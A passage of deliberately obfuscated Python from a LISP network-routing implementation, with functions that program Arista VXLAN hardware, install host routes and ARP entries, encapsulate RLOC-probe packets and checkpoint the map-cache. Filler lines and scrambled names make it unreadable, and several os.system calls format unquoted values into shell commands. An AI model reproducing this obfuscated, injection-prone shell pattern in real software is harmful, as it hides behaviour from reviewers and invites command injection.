if 92 - 92: Ii1I - O0 - i11iIiiIii + IiII % I1Ii111 + II111iiii
if 71 - 71: ooOoO0o * I1Ii111 + i11iIiiIii + i1IIi . I1IiiI
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 53 - 53: II111iiii / iIii1I11I1II1
iIi1Iiii11Ii1 = command
if ( interface != "" ) : iIi1Iiii11Ii1 = interface + ": " + iIi1Iiii11Ii1
lprint ( "Send CLI command '{}' to hardware" . format ( iIi1Iiii11Ii1 ) )
if 27 - 27: II111iiii - i1IIi
commands = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 4 - 4: I1IiiI
os . system ( "FastCli -c '{}'" . format ( commands ) )
return
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
def lisp_arista_is_alive ( prefix ) :
ooO0ooooO = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
oOOO = commands . getoutput ( "FastCli -c '{}'" . format ( ooO0ooooO ) )
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
if 26 - 26: oO0o + I1Ii111 + IiII * o0oOOo0O0Ooo . oO0o
if 95 - 95: OoOoOO00 . I1Ii111 / Ii1I . I1Ii111 % OoO0O00
oOOO = oOOO . split ( "\n" ) [ 1 ]
I1iI = oOOO . split ( " " )
I1iI = I1iI [ - 1 ] . replace ( "\r" , "" )
if 51 - 51: iIii1I11I1II1 / I1IiiI
if 27 - 27: O0 . o0oOOo0O0Ooo / ooOoO0o / OoooooooOO % Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
return ( I1iI == "Y" )
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
if 100 - 100: ooOoO0o + I1IiiI * oO0o + ooOoO0o
if 24 - 24: i11iIiiIii + ooOoO0o
if 80 - 80: IiII % I11i % oO0o
if 97 - 97: i1IIi * i11iIiiIii / Ii1I - I1IiiI % IiII
if 70 - 70: iIii1I11I1II1
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
if 23 - 23: IiII + oO0o + o0oOOo0O0Ooo . I1ii11iIi11i / i11iIiiIii + iIii1I11I1II1
if 74 - 74: I11i % OOooOOo
if 57 - 57: O0 + I1IiiI + i11iIiiIii
if 90 - 90: I1ii11iIi11i . OoO0O00 * iIii1I11I1II1 - Oo0Ooo
if 28 - 28: I1IiiI . ooOoO0o - ooOoO0o * OOooOOo . IiII
if 16 - 16: iIii1I11I1II1 % i11iIiiIii / Ii1I % iIii1I11I1II1 / iII111i
if 27 - 27: II111iiii * OoooooooOO / Oo0Ooo % O0
if 41 - 41: oO0o / iIii1I11I1II1 % iII111i - I1Ii111 % I11i * i11iIiiIii
if 21 - 21: O0
if 14 - 14: IiII / I1ii11iIi11i + Ii1I
if 48 - 48: I1Ii111 * oO0o / o0oOOo0O0Ooo * OoOoOO00 * ooOoO0o
if 38 - 38: I1IiiI * Ii1I + Oo0Ooo - OoooooooOO
if 63 - 63: I1ii11iIi11i
if 99 - 99: I1Ii111 % oO0o - II111iiii . ooOoO0o
if 26 - 26: I1ii11iIi11i * iII111i . OoooooooOO - Oo0Ooo - IiII
if 6 - 6: OOooOOo - I1IiiI . IiII
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
def lisp_program_vxlan_hardware ( mc ) :
if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 93 - 93: iIii1I11I1II1 / IiII
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
IiI1Iiii = mc . eid . print_prefix_no_iid ( )
I1II = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 32 - 32: I1Ii111 * I1IiiI + Ii1I
if 30 - 30: OoooooooOO / I1IiiI . iIii1I11I1II1 / ooOoO0o
if 20 - 20: OoooooooOO * OOooOOo
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
oo00o = commands . getoutput ( "ip route get {} | egrep vlan4094" . format ( IiI1Iiii ) )
if 94 - 94: ooOoO0o / ooOoO0o
if ( oo00o != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( IiI1Iiii , False ) , oo00o ) )
if 74 - 74: i11iIiiIii - oO0o % II111iiii . iIii1I11I1II1
return
if 94 - 94: OOooOOo + oO0o / OoooooooOO + o0oOOo0O0Ooo - o0oOOo0O0Ooo . OOooOOo
if 15 - 15: i11iIiiIii * O0 % iIii1I11I1II1 . OoooooooOO % oO0o + o0oOOo0O0Ooo
if 37 - 37: oO0o + O0 . IiII * I1ii11iIi11i
if 2 - 2: O0 . ooOoO0o
if 97 - 97: i1IIi . Oo0Ooo
if 81 - 81: OoOoOO00
if 81 - 81: O0
OO0OoooOo = commands . getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( OO0OoooOo . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 68 - 68: iII111i
if ( OO0OoooOo . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 59 - 59: O0 - i11iIiiIii + OoooooooOO - iII111i - Oo0Ooo . OoooooooOO
OoOo00oo0OooO = commands . getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( OoOo00oo0OooO == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 82 - 82: IiII * iIii1I11I1II1
OoOo00oo0OooO = OoOo00oo0OooO . split ( "inet " ) [ 1 ]
OoOo00oo0OooO = OoOo00oo0OooO . split ( "/" ) [ 0 ]
if 60 - 60: I1IiiI - I1IiiI + I1ii11iIi11i
if 8 - 8: I1Ii111 - I1Ii111 - i1IIi + I11i . i1IIi / I1Ii111
if 27 - 27: OoOoOO00 % ooOoO0o - II111iiii . I11i
if 70 - 70: OOooOOo / iII111i - I11i + OoOoOO00 % Ii1I * IiII
if 26 - 26: O0 / oO0o
if 96 - 96: ooOoO0o * iII111i . IiII
if 77 - 77: OOooOOo - I11i % o0oOOo0O0Ooo
IIiIiii1I1i = [ ]
iIIiiiiii = commands . getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for oOOo0ooO0 in iIIiiiiii :
if ( oOOo0ooO0 . find ( "vlan4094" ) == - 1 ) : continue
if ( oOOo0ooO0 . find ( "(incomplete)" ) == - 1 ) : continue
Oo00 = oOOo0ooO0 . split ( " " ) [ 0 ]
IIiIiii1I1i . append ( Oo00 )
if 34 - 34: I1Ii111 . IiII % iII111i
if 94 - 94: OOooOOo % i11iIiiIii . OOooOOo
Oo00 = None
o0OoOO = OoOo00oo0OooO
OoOo00oo0OooO = OoOo00oo0OooO . split ( "." )
for iIi1I1 in range ( 1 , 255 ) :
OoOo00oo0OooO [ 3 ] = str ( iIi1I1 )
o0o00O0oOooO0 = "." . join ( OoOo00oo0OooO )
if ( o0o00O0oOooO0 in IIiIiii1I1i ) : continue
if ( o0o00O0oOooO0 == o0OoOO ) : continue
Oo00 = o0o00O0oOooO0
break
if 55 - 55: OoOoOO00 . OoOoOO00 % o0oOOo0O0Ooo . I11i . I1ii11iIi11i - o0oOOo0O0Ooo
if ( Oo00 == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 1 - 1: i11iIiiIii - i1IIi * oO0o - iIii1I11I1II1
return
if 75 - 75: i1IIi * i11iIiiIii
if 40 - 40: I1ii11iIi11i + OoO0O00
if 8 - 8: i11iIiiIii - iIii1I11I1II1
if 73 - 73: OoOoOO00
if 25 - 25: iII111i / oO0o
if 61 - 61: OoooooooOO . Ii1I . I11i + oO0o
if 73 - 73: II111iiii % i11iIiiIii * I1ii11iIi11i + O0
oo0Oi111 = I1II . split ( "." )
OOoooo0o = lisp_hex_string ( oo0Oi111 [ 1 ] ) . zfill ( 2 )
IIiIi1ii1 = lisp_hex_string ( oo0Oi111 [ 2 ] ) . zfill ( 2 )
I1iiIi1IIIiII = lisp_hex_string ( oo0Oi111 [ 3 ] ) . zfill ( 2 )
i1III1iI = "00:00:00:{}:{}:{}" . format ( OOoooo0o , IIiIi1ii1 , I1iiIi1IIIiII )
ooO0OOoO = "0000.00{}.{}{}" . format ( OOoooo0o , IIiIi1ii1 , I1iiIi1IIIiII )
OOoOO = "arp -i vlan4094 -s {} {}" . format ( Oo00 , i1III1iI )
os . system ( OOoOO )
if 57 - 57: OoO0O00 . ooOoO0o * iIii1I11I1II1 * OoooooooOO
if 13 - 13: iII111i . i11iIiiIii * o0oOOo0O0Ooo . iII111i
if 96 - 96: Ii1I
if 90 - 90: II111iiii
Oo00i1i11iI1II = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( ooO0OOoO , I1II )
if 93 - 93: o0oOOo0O0Ooo
lisp_send_to_arista ( Oo00i1i11iI1II , None )
if 28 - 28: ooOoO0o . o0oOOo0O0Ooo . OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
if 69 - 69: I1IiiI
I1I1iii11I1 = "ip route add {} via {}" . format ( IiI1Iiii , Oo00 )
os . system ( I1I1iii11I1 )
if 28 - 28: IiII . o0oOOo0O0Ooo + iII111i - OoOoOO00 / OOooOOo
lprint ( "Hardware programmed with commands:" )
I1I1iii11I1 = I1I1iii11I1 . replace ( IiI1Iiii , green ( IiI1Iiii , False ) )
lprint ( " " + I1I1iii11I1 )
lprint ( " " + OOoOO )
Oo00i1i11iI1II = Oo00i1i11iI1II . replace ( I1II , red ( I1II , False ) )
lprint ( " " + Oo00i1i11iI1II )
return
if 86 - 86: ooOoO0o * OoOoOO00 + oO0o / II111iiii % OOooOOo
if 89 - 89: O0 * Ii1I / OoO0O00 / OoOoOO00 % iII111i * iIii1I11I1II1
if 72 - 72: iIii1I11I1II1 / iIii1I11I1II1 * I11i
if 19 - 19: I1ii11iIi11i
if 42 - 42: OoOoOO00 / IiII
if 65 - 65: ooOoO0o - ooOoO0o * OoO0O00
if 99 - 99: I11i % ooOoO0o . I1Ii111
def lisp_clear_hardware_walk ( mc , parms ) :
ii1111Ii = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( ii1111Ii ) )
return ( [ True , None ] )
if 34 - 34: ooOoO0o + oO0o + II111iiii . I1Ii111 . i1IIi
if 14 - 14: OoO0O00 . ooOoO0o - i1IIi * I1IiiI
if 24 - 24: iIii1I11I1II1 / I1Ii111
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
global lisp_no_map_request_rate_limit
if 44 - 44: iII111i
Oo0OOoOo0oOo = bold ( "User cleared" , False )
I1I1 = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( Oo0OOoOo0oOo , I1I1 ) )
if 54 - 54: I1IiiI % II111iiii
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 29 - 29: ooOoO0o - OOooOOo - I11i / I1Ii111
lisp_map_cache = lisp_cache ( )
if 88 - 88: O0 + IiII
if 91 - 91: OoooooooOO + OoO0O00 % I1Ii111 . I1IiiI . iIii1I11I1II1
if 88 - 88: OoooooooOO
if 40 - 40: ooOoO0o * oO0o * Ii1I . ooOoO0o + i11iIiiIii
lisp_no_map_request_rate_limit = lisp_get_timestamp ( )
if 44 - 44: o0oOOo0O0Ooo / iIii1I11I1II1
if 66 - 66: O0 % I11i . O0 * o0oOOo0O0Ooo / I1Ii111 + o0oOOo0O0Ooo
if 24 - 24: i11iIiiIii * oO0o * I1IiiI - i1IIi * OoOoOO00
if 5 - 5: I1ii11iIi11i % o0oOOo0O0Ooo . iII111i
if 73 - 73: OoOoOO00 . o0oOOo0O0Ooo * OoOoOO00
lisp_rloc_probe_list = { }
if 94 - 94: OoO0O00 / I1ii11iIi11i
if 50 - 50: OoOoOO00 % I1IiiI + I1Ii111 . iII111i . iII111i
if 89 - 89: oO0o / I1ii11iIi11i % I1Ii111
if 86 - 86: Ii1I * II111iiii % ooOoO0o
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 82 - 82: OOooOOo . Oo0Ooo * ooOoO0o % II111iiii % II111iiii - oO0o
if 71 - 71: iIii1I11I1II1 % i11iIiiIii . o0oOOo0O0Ooo - oO0o + Oo0Ooo
if 69 - 69: I1IiiI - OoOoOO00 . I1ii11iIi11i
if 88 - 88: ooOoO0o + ooOoO0o + oO0o * o0oOOo0O0Ooo . Ii1I
if 72 - 72: I11i / I11i
lisp_rtr_list = { }
if 78 - 78: I1IiiI % II111iiii
if 99 - 99: Oo0Ooo
if 30 - 30: OoOoOO00 + I1Ii111 . OoOoOO00 - I11i
if 42 - 42: OoOoOO00
lisp_gleaned_groups = { }
if 77 - 77: Oo0Ooo * IiII * I1ii11iIi11i + IiII
if 37 - 37: IiII . OoooooooOO - i11iIiiIii * I1ii11iIi11i - OOooOOo
if 74 - 74: Ii1I + i11iIiiIii * iII111i / o0oOOo0O0Ooo . i11iIiiIii
if 99 - 99: OOooOOo - OoooooooOO + OoooooooOO . OOooOOo
lisp_process_data_plane_restart ( True )
return
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if 87 - 87: I11i
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
if 4 - 4: OOooOOo + II111iiii
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
if 43 - 43: i11iIiiIii * I1IiiI
if 48 - 48: Oo0Ooo - OOooOOo / iII111i % I1ii11iIi11i . OoOoOO00
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 6 - 6: i11iIiiIii
OOOo00ooO = lisp_myrlocs [ 0 ]
if 34 - 34: O0 * iIii1I11I1II1 . o0oOOo0O0Ooo . I1Ii111 . iIii1I11I1II1 * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1
if 83 - 83: iII111i - Ii1I . oO0o - I1Ii111 * o0oOOo0O0Ooo
if 70 - 70: i11iIiiIii - OoO0O00 / i11iIiiIii
if 46 - 46: II111iiii + O0 * OoooooooOO
oOOoO0O = len ( packet ) + 28
ooooo0Oo0 = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( oOOoO0O ) , 0 , 64 ,
17 , 0 , socket . htonl ( OOOo00ooO . address ) , socket . htonl ( rloc . address ) )
ooooo0Oo0 = lisp_ip_checksum ( ooooo0Oo0 )
if 39 - 39: OoooooooOO % II111iiii . o0oOOo0O0Ooo
oOoO0OOO00O = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( oOOoO0O - 20 ) , 0 )
if 29 - 29: I11i . o0oOOo0O0Ooo . i1IIi . o0oOOo0O0Ooo
if 77 - 77: iIii1I11I1II1 + iIii1I11I1II1
if 52 - 52: I1ii11iIi11i - IiII % I1IiiI % i1IIi
if 98 - 98: I1Ii111 + II111iiii % OoO0O00 % iII111i
packet = lisp_packet ( ooooo0Oo0 + oOoO0OOO00O + packet )
if 54 - 54: II111iiii . ooOoO0o . iII111i - I1IiiI
if 97 - 97: oO0o - O0 / II111iiii * II111iiii - oO0o * IiII
if 97 - 97: IiII % OoO0O00 . OoOoOO00 - Ii1I
if 28 - 28: O0 . I11i . I1IiiI - Ii1I - iII111i - iIii1I11I1II1
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( OOOo00ooO )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( OOOo00ooO )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 14 - 14: OOooOOo + ooOoO0o
O0ooo0Ooo = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
IIIi = " {}" . format ( blue ( nat_info . hostname , False ) )
oO0oo000O = bold ( "RLOC-probe request" , False )
else :
IIIi = ""
oO0oo000O = bold ( "RLOC-probe reply" , False )
if 56 - 56: o0oOOo0O0Ooo - OoOoOO00 - Ii1I
if 50 - 50: I1ii11iIi11i
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( oO0oo000O , O0ooo0Ooo , IIIi , packet . encap_port ) )
if 24 - 24: ooOoO0o
if 19 - 19: oO0o
if 97 - 97: IiII
if 36 - 36: II111iiii
if 83 - 83: I11i . ooOoO0o
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 57 - 57: IiII
IIIiiII = lisp_sockets [ 3 ]
packet . send_packet ( IIIiiII , packet . outer_dest )
del ( packet )
return
if 50 - 50: i1IIi
if 2 - 2: iII111i * ooOoO0o - OoOoOO00
if 84 - 84: o0oOOo0O0Ooo * II111iiii / OoOoOO00
if 73 - 73: OoOoOO00 + OOooOOo * II111iiii . OOooOOo % I1Ii111 % oO0o
if 79 - 79: I1ii11iIi11i % I11i
if 78 - 78: i11iIiiIii % I1Ii111 + iIii1I11I1II1 + iII111i
if 66 - 66: I1IiiI - o0oOOo0O0Ooo
if 67 - 67: oO0o . iII111i * Ii1I - OOooOOo / oO0o
def lisp_get_default_route_next_hops ( ) :
if 98 - 98: OoOoOO00 * OoO0O00 . Oo0Ooo
if 6 - 6: I11i % iIii1I11I1II1 + I1Ii111
if 48 - 48: II111iiii . OOooOOo . ooOoO0o - iII111i
if 90 - 90: OOooOOo
if ( lisp_is_macos ( ) ) :
ooO0ooooO = "route -n get default"
i11iii = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
oOooii111 = II1i = None
for I1ii1ii in i11iii :
if ( I1ii1ii . find ( "gateway: " ) != - 1 ) : oOooii111 = I1ii1ii . split ( ": " ) [ 1 ]
if ( I1ii1ii . find ( "interface: " ) != - 1 ) : II1i = I1ii1ii . split ( ": " ) [ 1 ]
if 90 - 90: iII111i . Oo0Ooo * o0oOOo0O0Ooo % I11i . OoOoOO00
return ( [ [ II1i , oOooii111 ] ] )
if 63 - 63: I1ii11iIi11i + OoOoOO00 - Ii1I + OoO0O00 - II111iiii
if 47 - 47: I1IiiI * O0 + I1ii11iIi11i - OOooOOo
if 24 - 24: i1IIi / i1IIi + I11i * II111iiii / IiII
if 8 - 8: I11i . I11i + I11i % OoooooooOO / ooOoO0o
if 25 - 25: I1IiiI / OoO0O00
ooO0ooooO = "ip route | egrep 'default via'"
O0o00o000 = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
if 92 - 92: oO0o % I1IiiI / OoO0O00 - I11i
O000ooo00 = [ ]
for oo00o in O0o00o000 :
if ( oo00o . find ( " metric " ) != - 1 ) : continue
I1I111iIiI = oo00o . split ( " " )
try :
IiIiIII1iI1II = I1I111iIiI . index ( "via" ) + 1
if ( IiIiIII1iI1II >= len ( I1I111iIiI ) ) : continue
oOoooIiii11 = I1I111iIiI . index ( "dev" ) + 1
if ( oOoooIiii11 >= len ( I1I111iIiI ) ) : continue
except :
continue
if 48 - 48: OoooooooOO * OoO0O00 * iIii1I11I1II1 % I1Ii111
if 22 - 22: i1IIi
O000ooo00 . append ( [ I1I111iIiI [ oOoooIiii11 ] , I1I111iIiI [ IiIiIII1iI1II ] ] )
if 61 - 61: IiII
return ( O000ooo00 )
if 3 - 3: ooOoO0o . Oo0Ooo . ooOoO0o / OoO0O00 / o0oOOo0O0Ooo . I1Ii111
if 20 - 20: iII111i + II111iiii + i11iIiiIii
if 75 - 75: OoooooooOO
if 63 - 63: iII111i % oO0o . ooOoO0o * I1Ii111 + o0oOOo0O0Ooo * II111iiii
if 61 - 61: oO0o
if 45 - 45: I11i * OoOoOO00 % Oo0Ooo / iII111i
if 78 - 78: II111iiii
def lisp_get_host_route_next_hop ( rloc ) :
ooO0ooooO = "ip route | egrep '{} via'" . format ( rloc )
oo00o = commands . getoutput ( ooO0ooooO ) . split ( " " )
if 38 - 38: I11i - i11iIiiIii
try : ooo = oo00o . index ( "via" ) + 1
except : return ( None )
if 38 - 38: I1IiiI * i1IIi / OoO0O00 + iIii1I11I1II1 / I1Ii111 % II111iiii
if ( ooo >= len ( oo00o ) ) : return ( None )
return ( oo00o [ ooo ] )
if 62 - 62: OoOoOO00 * i1IIi + iII111i
if 43 - 43: OOooOOo % i11iIiiIii / I1ii11iIi11i + i1IIi / ooOoO0o
if 74 - 74: Ii1I + iIii1I11I1II1
if 23 - 23: OoO0O00 * i1IIi * oO0o % I1ii11iIi11i
if 92 - 92: iII111i / I1IiiI / i11iIiiIii
if 75 - 75: Oo0Ooo + IiII / I11i % I11i % IiII / I1Ii111
if 95 - 95: OoOoOO00
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
OOOo0OOo0oOo0 = "none" if nh == None else nh
if 78 - 78: I11i
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , OOOo0OOo0oOo0 ) )
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if ( nh == None ) :
iI1I1 = "ip route {} {}/32" . format ( install , dest )
else :
iI1I1 = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
os . system ( iI1I1 )
return
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
if 80 - 80: OoO0O00 - i11iIiiIii / iII111i * I1ii11iIi11i / I1IiiI - I1Ii111
if 85 - 85: IiII
if 72 - 72: iII111i * OoOoOO00
if 65 - 65: iIii1I11I1II1 / iIii1I11I1II1 % O0 / II111iiii . OOooOOo . O0
if 65 - 65: I11i
if 35 - 35: o0oOOo0O0Ooo - i11iIiiIii
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 78 - 78: ooOoO0o - II111iiii - i1IIi
I1ii1ii = open ( lisp_checkpoint_filename , "w" )
for i1ii1i1Ii11 in checkpoint_list :
I1ii1ii . write ( i1ii1i1Ii11 + "\n" )
if 18 - 18: OoooooooOO % OoOoOO00 - IiII / oO0o . OOooOOo . I1IiiI
I1ii1ii . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
I1ii1ii = open ( lisp_checkpoint_filename , "r" )
if 31 - 31: ooOoO0o
I1I1 = 0
for i1ii1i1Ii11 in I1ii1ii :
I1I1 += 1
iIIi1iI1I1IIi = i1ii1i1Ii11 . split ( " rloc " )
ooOOo = [ ] if ( iIIi1iI1I1IIi [ 1 ] in [ "native-forward\n" , "\n" ] ) else iIIi1iI1I1IIi [ 1 ] . split ( ", " )
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
OoO0oOOooOO = [ ]
for I1II in ooOOo :
o0oO0O00 = lisp_rloc ( False )
I1I111iIiI = I1II . split ( " " )
o0oO0O00 . rloc . store_address ( I1I111iIiI [ 0 ] )
o0oO0O00 . priority = int ( I1I111iIiI [ 1 ] )
o0oO0O00 . weight = int ( I1I111iIiI [ 2 ] )
OoO0oOOooOO . append ( o0oO0O00 )
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
o0oO0o00 = lisp_mapping ( "" , "" , OoO0oOOooOO )
if ( o0oO0o00 != None ) :
o0oO0o00 . eid . store_prefix ( iIIi1iI1I1IIi [ 0 ] )
o0oO0o00 . checkpoint_entry = True
o0oO0o00 . map_cache_ttl = LISP_NMR_TTL * 60
if ( OoO0oOOooOO == [ ] ) : o0oO0o00 . action = LISP_NATIVE_FORWARD_ACTION
o0oO0o00 . add_cache ( )
continue
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
I1I1 -= 1
if 31 - 31: iIii1I11I1II1
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
I1ii1ii . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , I1I1 , lisp_checkpoint_filename ) )
return
if 20 - 20: iIii1I11I1II1 % OOooOOo
if 91 - 91: ooOoO0o
if 96 - 96: I1IiiI . OOooOOo
if 94 - 94: OoooooooOO + II111iiii % ooOoO0o - II111iiii / O0
if 34 - 34: IiII % oO0o
if 54 - 54: I1IiiI
if 80 - 80: OoOoOO00 . I1IiiI / I1ii11iIi11i . iII111i
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
